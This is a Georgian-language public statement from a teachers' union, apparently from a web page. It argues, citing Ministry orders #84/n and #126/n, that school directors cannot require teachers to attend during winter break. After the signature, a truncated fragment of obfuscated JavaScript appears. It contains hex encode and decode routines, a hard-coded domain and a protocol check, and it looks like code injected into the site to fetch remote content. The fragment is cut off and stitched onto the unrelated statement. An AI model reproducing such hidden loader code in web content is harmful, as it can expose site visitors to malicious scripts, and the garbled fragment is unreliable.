მიმართვა საჯარო სკოლებს იანვრის არდადაგების შესახებ

აქართველოს პედაგოგთა და მეცნიერთა თავისუფალ პროფკავშირში შემოვიდა ინფორმაცია, რომლის თანახმადაც, ზოგიერთი საჯარო სკოლის დირექტორი მოითხოვს მასწავლებლებისგან, ზამთრის არდადეგების პერიოდში, ყოველდღიურად გამოცხადდეს სამსახურში, დილის ცხრა საათიდან შუადღის 2 საათამდე.

ჩვენი ორგანიზაცია მოუწოდებს ასეთ დირექტორებს, ზედმიწევნით შეასრულონ განათლების სისტემაში მოქმედი ნორმატიული აქტების მოთხოვნები და თავი შეიკავონ პედაგოგთა შრომითი უფლებების დარღვევისაგან.

განვმარტავთ, რომ „ზოგადი განათლების შესახებ“ საქართველოს კანონის 26-ე მუხლის პირველი პუნქტის “ც” ქვეპუნქტის თანახმად, საქართველოს განათლებისა და მეცნიერების სამინისტრო ადგენს საჯარო სკოლებში წლის განმავლობაში სასწავლო დღეების მინიმალურ და მაქსიმალურ ოდენობებს, არდადეგების მინიმალურ და მაქსიმალურ ხანგრძლივობას. აგრეთვე, უფლებამოსილია დაადგინოს სასწავლო წლის დაწყებისა და დამთავრების და არდადეგების დრო და ხანგრძლივობა.
ზემოაღნიშნული მოთხოვნის შესაბამისად, „საქართველოს ზოგადსაგანმანათლებლო დაწესებულებებში სასწავლო წლისა და არდადეგების დაწყებისა და დასრულების თარიღების განსაზღვრის შესახებ“ საქართველოს განათლებისა და მეცნიერების მინისტრის #84/ნ ბრძანების მე-4 პუნქტის მიხედვით, ზამთრის არდადეგები უნდა დაიწყოს 30 დეკემბერიდან და გაგრძელდეს 14 იანვრის ჩათვლით.
შესაბამისად, აღნიშნულ პერიოდში პედაგოგები არ არიან ვალდებულნი, იარონ სკოლაში.
იმის გათვალისწინებით, რომ ზოგიერთი დირექტორის მოსაზრებით 84/ნ ბრძანებით გათვალისწინებული ზამთრის არდადეგებით სარგებლობენ მხოლოდ მოსწავლეები, დამატებით განგიმარტავთ, რომ „საჯარო სკოლების მასწავლებელთა შრომის ანაზღაურების მინიმალური ოდენობისა და პირობების დადგენის თაობაზე“ საქართველოს განათლებისა და მეცნიერების მინისტრის #126/ნ ბრძანების მე-11 მუხლის („მასწავლებლის სამუშაო საათები“) მე-5 პუნქტის თანახმად:
„მასწავლებლისათვის თანამდებობრივი სარგოს მიცემა სამუშაო საათების მიხედვით არ ნიშნავს, რომ იგი საგაკვეთილო საათების, სასკოლო დოკუმენტაციის წარმოებისა და მოსწავლესთან ინდივიდუალური მუშაობისათვის საჭირო დროის გარდა აუცილებლად უნდა იმყოფებოდეს სკოლაში.“
ანუ, ვინაიდან ზამთრის არდადეგების პერიოდში ფიზიკურად ვერ ჩატარდება გაკვეთილები, დირექტორს არ აქვს უფლება, მოითხოვოს პედაგოგებისგან სამსახურში გამოცხადება.

რაც შეეხება 1 და 2 იანვარს, აღნიშნული დღეები ითვლება უქმე დღეებად, ორგანული კანონის – „საქართველოს შრომის კოდექსის“ თანახმად.

ინფორმაციას ავრცელებს.საქართველოს-პედაგოგთა-და-მეცნიერთა-თავისუფალი-პროფკავშირი-სპმთპ

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply